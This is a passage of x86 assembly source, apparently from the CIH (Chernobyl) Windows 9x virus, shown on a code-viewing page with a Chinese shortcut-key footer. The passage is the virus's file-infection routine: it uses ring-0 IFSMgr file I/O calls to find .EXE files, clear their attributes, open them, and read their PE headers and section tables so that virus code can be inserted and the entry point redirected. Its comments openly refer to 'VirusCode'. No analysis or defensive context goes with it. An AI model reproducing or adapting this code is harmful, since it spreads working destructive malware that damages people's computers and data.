📄 cih14.txt
字号:
CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy
IF DEBUG
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy
ENDIF
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy
mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]
test cl, 01h
jz OpenFile
mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
pop ecx
pushf
test cl, 01h
jz IsOpenFileOK
mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO
IsOpenFileOK:
popf
jc DisableOnBusy
push esi ; Push FileNameBuffer Address to Stack
pushf ; Now CF = 0, Push Flag to Stack
add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
xor eax, eax
mov ah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax
push 00000004h
pop ecx
push 0000003ch
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer
mov dr1, esp
push eax ; Size
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO
lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer
movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]
mov al, SizeOfScetionTable
mov cl, (NumberOfSections-@8)[esi]
mul cl
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -